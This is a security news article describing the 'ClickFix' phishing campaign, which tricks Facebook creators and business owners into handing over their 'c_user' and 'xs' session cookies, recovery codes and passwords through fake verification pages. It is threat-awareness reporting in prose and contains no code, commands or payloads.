A sophisticated phishing campaign, dubbed “ClickFix,” is actively targeting Facebook users, particularly content creators and business owners, by illicitly stealing their account credentials and session tokens. This widespread attack, which has seen significant growth since early 2025, leverages social engineering tactics, masquerading as official Facebook verification processes to trick victims into compromising their accounts.
The ClickFix campaign exploits users’ desire for verification badges or their fear of account policy violations. Attackers create convincing fake Facebook help center or verification portal pages. These pages employ urgency and trust-building elements, such as instructional videos, to guide victims through a carefully orchestrated process designed to extract crucial authentication data, known as session tokens.
ClickFix Campaign Leverages Social Engineering for Facebook Token Theft
The core of the ClickFix attack lies in its deceptive use of social engineering rather than complex technical exploits. Victims are enticed by promises of free verification badges or warned of urgent account reviews. Upon clicking a malicious link, they are directed to meticulously crafted phishing pages that mimic Facebook’s official interface.
These fraudulent pages present users with scenarios requiring immediate action. Content creators and business page owners, often eager for the blue verification badge, are particularly susceptible. The attackers exploit this desire by simulating a verification or policy review process that demands user cooperation.
A pivotal aspect of the ClickFix campaign involves instructing victims on how to manually extract their Facebook session tokens. Through embedded instructional videos, attackers guide users to access their browser’s developer tools. Here, they are prompted to locate and copy specific session cookie values, primarily ‘c_user’ and ‘xs’, which are then submitted to the attackers.
Researchers from Hunt.io, building on initial findings by Unit42 Threat Intelligence in December 2025, have identified a robust and adaptable infrastructure behind this operation. The campaign, active since January 2025, has reportedly created over 115 distinct phishing pages and eight data collection endpoints, demonstrating its scale and persistence.
The stolen session tokens offer attackers complete control over the compromised Facebook accounts. This can lead to various malicious activities, including unauthorized password changes, theft of sensitive payment information linked to the account, and impersonation of the victim.
The operational strategy of the ClickFix campaign involves a deliberately distributed infrastructure. Phishing pages are hosted on various abuse-friendly platforms such as Netlify, Vercel, GitHub Pages, and Surge. This allows attackers to rapidly deploy new pages within minutes if an existing one is detected and taken down, making containment challenging.
Data collection, a critical component of the attack, is handled by separate endpoints utilizing services like Formspark and submit-form.com, effectively decoupling the stolen data from the phishing sites themselves and adding another layer of obfuscation.
The Deceptive Attack Flow of ClickFix
The ClickFix attack initiates with a subtly designed redirect chain, aiming to provide a seamless user experience. A user might encounter a link on social media promising a free blue badge or a notification about a flagged account. The initial landing page often features animated verification screens and sounds to establish a sense of legitimacy.
Following the initial animation, victims are automatically redirected to a secondary page that fully replicates Facebook’s branding, complete with logos, color schemes, and official-sounding language. This page is crucial for reinforcing the illusion of an authentic Facebook process.
At this stage, the phishing page prominently displays urgent warnings and calls to action, such as “Action Required” buttons and countdown timers. These elements are designed to pressure users into immediate action, overriding their critical thinking.
The instructional video plays a key role by explicitly detailing how to access browser developer tools and locate the necessary session cookies. This step is where victims voluntarily provide their authentication tokens, believing it to be a standard verification procedure.
Upon entering the ‘c_user’ and ‘xs’ values into a form field, the JavaScript on the phishing page validates these tokens in real-time against legitimate Facebook session patterns. This filtering mechanism ensures that attackers receive only valid and usable session data, streamlining their account takeover efforts.
The attackers often include instructions for victims to avoid logging out for 24 hours. This directive is intended to keep the harvested session cookies active long enough for immediate account exploitation.
Should the initial token theft prove unsuccessful or the session cookie expire, the ClickFix campaign has built-in fallback mechanisms. The fake verification page may present further harvesting stages, requesting backup or recovery codes. Subsequently, a pop-up might appear, demanding additional password verification. This final step aims to trick users into divulging their actual Facebook password, thereby completing a comprehensive credential harvesting chain that provides attackers with multiple avenues for account access.